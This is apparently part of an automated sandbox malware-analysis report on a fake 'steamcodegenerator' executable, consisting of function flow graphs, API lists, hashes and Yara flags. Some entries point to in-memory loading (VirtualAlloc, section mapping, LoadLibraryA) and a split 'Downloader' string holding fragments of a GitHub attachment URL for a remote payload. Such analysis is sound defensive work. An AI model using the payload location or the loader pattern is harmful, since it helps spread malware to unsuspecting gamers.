7ff663542774-7ff663542779 call 7ff663552044 65->76 67->68 67->76 68->62 73 7ff6635426b1-7ff6635426b9 70->73 74 7ff66354267f-7ff663542690 70->74 78 7ff663542656-7ff663542669 71->78 79 7ff66354266f-7ff663542674 call 7ff663548db0 71->79 83 7ff6635426ed-7ff6635426f5 73->83 84 7ff6635426bb-7ff6635426cc 73->84 80 7ff6635426ab-7ff6635426b0 call 7ff663548db0 74->80 81 7ff663542692-7ff6635426a5 74->81 87 7ff66354277a-7ff66354277f call 7ff663552044 76->87 78->79 78->87 79->70 80->73 81->80 89 7ff663542780-7ff663542785 call 7ff663552044 81->89 95 7ff6635426f7-7ff663542708 83->95 96 7ff663542724-7ff66354274f call 7ff663548d90 83->96 91 7ff6635426e7-7ff6635426ec call 7ff663548db0 84->91 92 7ff6635426ce-7ff6635426e1 84->92 87->89 100 7ff663542786-7ff66354278b call 7ff663552044 89->100 91->83 92->91 92->100 104 7ff66354270a-7ff66354271d 95->104 105 7ff66354271f call 7ff663548db0 95->105 104->105 111 7ff663542750-7ff663542755 call 7ff663552044 104->111 105->96 111->25
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Virtual$AllocFreeSleep
                                                                        • String ID: Downloader$htt$nts/files/17267811/stm.txt$om/user-attachme$ps://gith$ub.c
                                                                        • API String ID: 1298506739-3644530041
                                                                        • Opcode ID: ea04dfb8b05b74b2b0620327f61315c56e469aa5f16ef72dec762d63fb4ec1f1
                                                                        • Instruction ID: abd27d062c9add0ec87308cba667c1db4d319a33626236ad97be4dc1336558be
                                                                        • Opcode Fuzzy Hash: ea04dfb8b05b74b2b0620327f61315c56e469aa5f16ef72dec762d63fb4ec1f1
                                                                        • Instruction Fuzzy Hash: 4BE19362E14B8685EB04DB75D4463AD2731EB957A4F109321EA5CABBEADF3CE4D0C340
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: SectionVirtual$ProtectView$AllocCreateUnmap
                                                                        • String ID: @
                                                                        • API String ID: 1653215272-2766056989
                                                                        • Opcode ID: 2ed318d2ea2cf2278bd42e912a4e74bd6f32db374bd63d65325d2cd2078d0a12
                                                                        • Instruction ID: a433a889392196f9f958826b5d23155d13bec697d6aa6df5d7f42730d65b7dec
                                                                        • Opcode Fuzzy Hash: 2ed318d2ea2cf2278bd42e912a4e74bd6f32db374bd63d65325d2cd2078d0a12
                                                                        • Instruction Fuzzy Hash: AE72DB30654B488BDB69DF68C8897EA73E1FB98304F14452DD98BC7641EF39E942CB42

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 297 22af4e191ab-22af4e191c7 298 22af4e191e2-22af4e191f1 297->298 299 22af4e191c9-22af4e191cd 297->299 301 22af4e1921d-22af4e1922f 298->301 302 22af4e191f3-22af4e19218 298->302 299->298 300 22af4e191cf-22af4e191e0 299->300 300->298 300->299 303 22af4e19232-22af4e19239 301->303 302->301 304 22af4e1923b-22af4e1924a 303->304 305 22af4e19274-22af4e19279 LoadLibraryA 303->305 307 22af4e1924c-22af4e19265 call 22af4e19a17 304->307 308 22af4e19267-22af4e1926d 304->308 306 22af4e1927c-22af4e1928b 305->306 307->308 312 22af4e1928c-22af4e1928f 307->312 308->303 309 22af4e1926f-22af4e19272 308->309 309->305 309->306 312->306
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID: l
                                                                        • API String ID: 1029625771-2517025534
                                                                        • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                        • Instruction ID: 9c3b2ea1a96077160ca5fafe672257fffc19f3409ad6c5d2a1f707667483d415
                                                                        • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                        • Instruction Fuzzy Hash: 4A310620558A854FE799DB2CD148B62BBD5FBA930CF2446ACC1CBC3953E728C446CB02

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 313 7ff663546130-7ff66354615e 314 7ff663546345-7ff663546352 313->314 315 7ff663546164-7ff663546179 313->315 316 7ff6635462cd-7ff6635462d6 315->316 317 7ff66354617f-7ff663546198 315->317 318 7ff663546318-7ff663546338 call 7ff6635695a0 * 2 316->318 319 7ff6635462d8-7ff663546316 call 7ff6635695a0 * 3 316->319 320 7ff66354635f-7ff663546364 call 7ff663546370 317->320 321 7ff66354619e-7ff6635461b9 317->321 345 7ff66354633d 318->345 319->345 323 7ff6635461bb 321->323 324 7ff6635461e1-7ff6635461f6 321->324 328 7ff6635461c5 call 7ff663548db8 323->328 330 7ff6635461f8-7ff6635461ff 324->330 331 7ff663546207-7ff66354620a 324->331 343 7ff6635461ca-7ff6635461cd 328->343 335 7ff663546359-7ff66354635e call 7ff6635412b0 330->335 336 7ff663546205 330->336 337 7ff663546219 331->337 338 7ff66354620c-7ff663546217 call 7ff663548db8 331->338 335->320 336->328 340 7ff66354621b-7ff66354623d call 7ff6635695a0 337->340 338->340 356 7ff663546251-7ff66354626e call 7ff6635695a0 340->356 357 7ff66354623f-7ff663546242 340->357 349 7ff663546353-7ff663546358 call 7ff663552044 343->349 350 7ff6635461d3-7ff6635461df 343->350 345->314 349->335 350->340 360 7ff663546271-7ff663546281 call 7ff6635695a0 356->360 357->356 358 7ff663546244-7ff66354624f 357->358 358->360 364 7ff6635462b4-7ff6635462cb 360->364 365 7ff663546283-7ff663546291 360->365 364->345 366 7ff6635462af call 7ff663548db0 365->366 367 7ff663546293-7ff6635462a6 365->367 366->364 367->349 368 7ff6635462ac 367->368 368->366
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                        • String ID:
                                                                        • API String ID: 73155330-0
                                                                        • Opcode ID: c35681c349dced017d86a5f3adb7903ad82b0333e43f206d0047bf9162d83481
                                                                        • Instruction ID: cf09f7baaa8963970c460b63ab47fbf886289850dcb43a33537244b6b0eb649c
                                                                        • Opcode Fuzzy Hash: c35681c349dced017d86a5f3adb7903ad82b0333e43f206d0047bf9162d83481
                                                                        • Instruction Fuzzy Hash: 41515562B19B86C5ED18DF22D5092BD6270AF55FD0F984232DE5DABB96DE3CE061C300

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                        • String ID:
                                                                        • API String ID: 1236291503-0
                                                                        • Opcode ID: d1d0374af1531000f124c1798acd8703a075724bd8eabcca79cb574d2685e6b7
                                                                        • Instruction ID: 89102133c67ab82854caf1ffe5532a1d8a71d4222b238106eab94628c94cccea
                                                                        • Opcode Fuzzy Hash: d1d0374af1531000f124c1798acd8703a075724bd8eabcca79cb574d2685e6b7
                                                                        • Instruction Fuzzy Hash: 25311521A0C283C1FA58AB6695533B963B1AF85784F445038EA4EEF3E7DE2DF814C341

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleType
                                                                        • String ID:
                                                                        • API String ID: 3000768030-0
                                                                        • Opcode ID: 080277b50c5276ac360943eb1b1c156bec9c5cf942e338d9d9fe34af66a790ff
                                                                        • Instruction ID: 7fb30ef1a6a770e04211eb73f293b00ca59873c0d0d05a7defbbad482b99c966
                                                                        • Opcode Fuzzy Hash: 080277b50c5276ac360943eb1b1c156bec9c5cf942e338d9d9fe34af66a790ff
                                                                        • Instruction Fuzzy Hash: EE31C532A28B46D2EB618B1585911787670FB45BB0F641739DB6EAB3E0CF38F4A1C350

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                        • String ID:
                                                                        • API String ID: 1173176844-0
                                                                        • Opcode ID: 44696b21bd67145d8e0760ec95888dcbd043158a58de3966fd1fe4f79ebb6704
                                                                        • Instruction ID: 938c4c1f96f4a16acec81b8396cca89ae6551491570624f576198917d2568126
                                                                        • Opcode Fuzzy Hash: 44696b21bd67145d8e0760ec95888dcbd043158a58de3966fd1fe4f79ebb6704
                                                                        • Instruction Fuzzy Hash: 95F03A11E1A606C1FE2D666614072B501604F18370E180630DE7CAF7D3EE2EB4B58291

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629964375.0000022AF4E51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000022AF4E51000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e51000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Exec
                                                                        • String ID:
                                                                        • API String ID: 459137531-0
                                                                        • Opcode ID: 1ce1e83e12cea887f5631db8c3beb4c8b375af077da88e97cfda06e046574df1
                                                                        • Instruction ID: efc94ce1ca0e1e85637900c4ec84d01a9e382cb6c54f0ea10dbbe69257485c32
                                                                        • Opcode Fuzzy Hash: 1ce1e83e12cea887f5631db8c3beb4c8b375af077da88e97cfda06e046574df1
                                                                        • Instruction Fuzzy Hash: 14318431204D084FEB48FF74DD5DBAA77A6E798301F00853A950BC7665DA7DCA05CB41

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 540 22af4e179f8-22af4e17a0e VirtualAlloc 541 22af4e17a3c-22af4e17a65 call 22af4e199bb call 22af4e199db 540->541 542 22af4e17a10-22af4e17a17 540->542 550 22af4e17aa1-22af4e17ab7 call 22af4e1943b 541->550 551 22af4e17a67-22af4e17a9b call 22af4e195ef call 22af4e194af 541->551 544 22af4e17a1d 542->544 545 22af4e17a19 542->545 546 22af4e17a20-22af4e17a3b 544->546 545->544 550->544 556 22af4e17abd-22af4e17abe 550->556 551->550 562 22af4e17cf6-22af4e17cf7 551->562 558 22af4e17ac4-22af4e17aca 556->558 560 22af4e17acc 558->560 561 22af4e17b07-22af4e17b12 558->561 563 22af4e17ace-22af4e17ad0 560->563 565 22af4e17b14-22af4e17b2e call 22af4e1943b 561->565 566 22af4e17b47-22af4e17b50 561->566 564 22af4e17cfc-22af4e17d0d 562->564 569 22af4e17ad2-22af4e17ad8 563->569 570 22af4e17ae9-22af4e17aeb 563->570 571 22af4e17d0f-22af4e17d19 564->571 572 22af4e17d40-22af4e17d61 call 22af4e199db 564->572 587 22af4e17b3d-22af4e17b45 565->587 588 22af4e17b30-22af4e17b37 565->588 567 22af4e17b71-22af4e17b7a 566->567 568 22af4e17b52-22af4e17b62 call 22af4e16ab7 566->568 567->564 577 22af4e17b80-22af4e17b8a 567->577 568->564 589 22af4e17b68-22af4e17b6f 568->589 569->570 575 22af4e17ada-22af4e17ae7 569->575 570->561 578 22af4e17aed-22af4e17b05 call 22af4e191ab 570->578 571->572 576 22af4e17d1b-22af4e17d39 call 22af4e199db 571->576 602 22af4e17d63 572->602 603 22af4e17d67-22af4e17d69 572->603 575->563 575->570 576->572 583 22af4e17b8c-22af4e17b8d 577->583 584 22af4e17b94-22af4e17b9b 577->584 578->558 583->584 591 22af4e17b9d-22af4e17ba7 call 22af4e168fb 584->591 592 22af4e17bcf-22af4e17bd3 584->592 587->565 587->566 588->562 588->587 589->584 607 22af4e17bb6-22af4e17bc0 call 22af4e16a27 591->607 608 22af4e17ba9-22af4e17bb0 591->608 594 22af4e17c86-22af4e17c8e 592->594 595 22af4e17bd9-22af4e17c02 592->595 598 22af4e17ce0-22af4e17ce6 call 22af4e1819f 594->598 599 22af4e17c90-22af4e17c96 594->599 595->564 612 22af4e17c08-22af4e17c22 call 22af4e199bb 595->612 610 22af4e17ceb-22af4e17cf2 598->610 604 22af4e17cad-22af4e17cbf call 22af4e1771f 599->604 605 22af4e17c98-22af4e17c9e 599->605 602->603 603->546 623 22af4e17cd1-22af4e17cde call 22af4e171af 604->623 624 22af4e17cc1-22af4e17ccc call 22af4e17d6f 604->624 605->610 611 22af4e17ca0-22af4e17cab call 22af4e18c53 605->611 607->592 620 22af4e17bc2-22af4e17bc9 607->620 608->564 608->607 610->564 615 22af4e17cf4 610->615 611->610 625 22af4e17c3e-22af4e17c81 612->625 626 22af4e17c24-22af4e17c27 612->626 615->615 620->564 620->592 623->610 624->623 625->564 634 22af4e17c83-22af4e17c84 625->634 626->594 629 22af4e17c29-22af4e17c3c call 22af4e1973f 626->629 629->634 634->594
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocCreateSectionVirtual
                                                                        • String ID:
                                                                        • API String ID: 1590197315-0
                                                                        • Opcode ID: eb4d697b95cde0fb80402334880357f1ef1fd47815b20976dc2f64c6329480eb
                                                                        • Instruction ID: 66f182a7c7571d9a61b3a0ea4555a767a1dbaf515bb9618706b2eccc306aef4a
                                                                        • Opcode Fuzzy Hash: eb4d697b95cde0fb80402334880357f1ef1fd47815b20976dc2f64c6329480eb
                                                                        • Instruction Fuzzy Hash: B9B1F7303549055BEB69DA68C5887EBB3D1FBC8700F140169D54AC3982EB2EE952CE83

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6635490E4
                                                                          • Part of subcall function 00007FF66354AE30: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF66354AE38
                                                                          • Part of subcall function 00007FF66354AE30: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF66354AE3D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                        • String ID:
                                                                        • API String ID: 1208906642-0
                                                                        • Opcode ID: 474fc897f0be47f68d46e62fd6981f481194b323a22c8996711b27343b9b6b83
                                                                        • Instruction ID: ab4b8f37921049d3dadbf3cd551d987732db1c0aca2a0c0d4de58851d099ed05
                                                                        • Opcode Fuzzy Hash: 474fc897f0be47f68d46e62fd6981f481194b323a22c8996711b27343b9b6b83
                                                                        • Instruction Fuzzy Hash: D5E0BD20E2D283C0FEAC262113072B906B01F22349F405078E85EFF3839E0E36765222

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF66355F7B1,?,?,00000000,00007FF663564803,?,?,?,00007FF663557CF3,?,?,?,00007FF663557BE9), ref: 00007FF663558B6E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 4292702814-0
                                                                        • Opcode ID: bd55b1ea0fc155a6d1c409fefb9d932666b1c806ec432e723f80dda1b82eeeb6
                                                                        • Instruction ID: 77f06f87dff7bb763c0fa1be9674a5d89df1adc08da76f4a3cc805b8f86322c2
                                                                        • Opcode Fuzzy Hash: bd55b1ea0fc155a6d1c409fefb9d932666b1c806ec432e723f80dda1b82eeeb6
                                                                        • Instruction Fuzzy Hash: 1FF058A1F29746C5FA6426A2588327431B84F847B0F0C4A30D93EEF3D2DE2CB4404711
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: s$s$,
                                                                        • API String ID: 3215553584-728586918
                                                                        • Opcode ID: 06cdfdd089d7f53002eee445f53705af94493326fe36f7a161390db78508ff4b
                                                                        • Instruction ID: 7d7164af15473993dbf3af6ce78a060b9e5a4f90c6fe5a2827e76a8b5351ebc6
                                                                        • Opcode Fuzzy Hash: 06cdfdd089d7f53002eee445f53705af94493326fe36f7a161390db78508ff4b
                                                                        • Instruction Fuzzy Hash: 6AA2F172B18282CBE7248E66D4427FC37B1FB55788F505535DA0AAFB95DF38AA00CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                        • String ID: utf8
                                                                        • API String ID: 3069159798-905460609
                                                                        • Opcode ID: d4b3ff6ab2fd706453dd6c794e4175711012dd38f10e3c9d27665adbabbc73f4
                                                                        • Instruction ID: faaf3df6ff013abf0e4d628c6ba3c6916d7146ea831463230184bfc4619a0357
                                                                        • Opcode Fuzzy Hash: d4b3ff6ab2fd706453dd6c794e4175711012dd38f10e3c9d27665adbabbc73f4
                                                                        • Instruction Fuzzy Hash: 84918C32B08742C6EB24AF22D9422B963B4EF46B80F454135DA4DAB7B6DF3DE955C340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                        • String ID:
                                                                        • API String ID: 2591520935-0
                                                                        • Opcode ID: 9965b17ae3c4a17e3d0caa9ea39aea03ad22011a5320ec8fc02cfc6467b481ea
                                                                        • Instruction ID: e2ce7bf85bdb2070c59ed0fcb70d3d38a893e4068297cad81bc644bca21dcfa3
                                                                        • Opcode Fuzzy Hash: 9965b17ae3c4a17e3d0caa9ea39aea03ad22011a5320ec8fc02cfc6467b481ea
                                                                        • Instruction Fuzzy Hash: F6717DB2F18642CAFB519F62D8626BD23B4BF46744F444135CA0DAB7A5EF3CA445C390
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                        • String ID:
                                                                        • API String ID: 3140674995-0
                                                                        • Opcode ID: 98028c3c7c245ce19bddfd2eddf14e9f2f0bacc6a8fa3fd2ff093612927a1805
                                                                        • Instruction ID: 7e480425bca8bd724050d53f4c31735c7e6727ba6155bc1e255bac78acd69230
                                                                        • Opcode Fuzzy Hash: 98028c3c7c245ce19bddfd2eddf14e9f2f0bacc6a8fa3fd2ff093612927a1805
                                                                        • Instruction Fuzzy Hash: 7E314C72608B81C6EB649F62E8413ED73B0FB85754F04403ADA4E9BB99EF38D548C710
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                        • String ID:
                                                                        • API String ID: 1239891234-0
                                                                        • Opcode ID: 8912553d44b3abefc55f9a8b3a26313e64a573415501656d81ef5f530cc03b7e
                                                                        • Instruction ID: ed05809610c7604cd59a1c5fd38d68a31d3560623c9cf61532107b31542aed43
                                                                        • Opcode Fuzzy Hash: 8912553d44b3abefc55f9a8b3a26313e64a573415501656d81ef5f530cc03b7e
                                                                        • Instruction Fuzzy Hash: 00318E36608F81C6DB60DF25E8412AE77B0FB89764F400135EA9D97B65DF38D155CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                        • String ID: %$+
                                                                        • API String ID: 3668304517-2626897407
                                                                        • Opcode ID: 269d37533fdaf201db9261dc3333217303a5f80c2e6368c3b5d31c85d833f6b3
                                                                        • Instruction ID: 3db07df3b28ffbb761da1e23f136007701d8720b5556fe52907c3418695e30b9
